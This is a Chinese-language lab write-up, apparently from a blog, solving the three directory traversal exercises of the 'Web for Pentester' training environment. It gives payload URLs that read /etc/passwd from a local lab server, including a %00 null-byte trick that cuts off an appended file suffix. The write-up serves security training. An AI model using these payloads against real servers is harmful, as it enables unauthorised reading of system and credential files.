Web for pentester_writeup之Directory traversal篇

Web for pentester_writeup之Directory traversal篇

Directory traversal(目录遍历)

目录遍历漏洞,这部分有三个例子,直接查看源代码

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102050863-1371248697.png)

Example 1

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102335362-754406170.png)

<1>测试输入`./`,停留在本目录

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102345221-624039856.png)

<2>测试输入../,发现目录切换,猜测是返回上级目录

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102355188-36212944.png)

直接溯源到根目录测试是否可以访问/etc/passwd

Payload
http://192.168.219.136/dirtrav/example1.php?file=../../../../../../../../../etc/passwd

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102405953-1976091057.png)

Example 2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102412490-1440822577.png)

发现是绝对目录,同上,直接溯源到根目录测试是否可以访问/etc/passwd

Payload
http://192.168.219.136/dirtrav/example2.php?file=/var/www/files/../../../../../../../../../../etc/passwd

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102448352-1919378040.png)

###**Example 3**

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102556286-1017459648.png)

没有后缀,直接测试../../../../../../etc/passwd无返回

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102606746-1976925149.png)

猜测是自动在参数后面加上了.png的后缀,使用%00 URL编码代表NUL空字节截断后缀

Payload
http://192.168.219.136/dirtrav/example3.php?file=../../../../../../../etc/passwd%00

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102613858-216281601.png)

使用空字节消除由服务器端代码添加的任何后缀是一种常见的旁路,在Perl和旧版本的PHP中经常使用到。
在本环境这段代码中,这个问题是模拟的,因为PHP[5.3.4]版本之后解决这种绕过(http://php.net/releases/5_3_4.php)。

https://chaceshadow.github.io/
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/liliyuanshangcao/p/11319648.html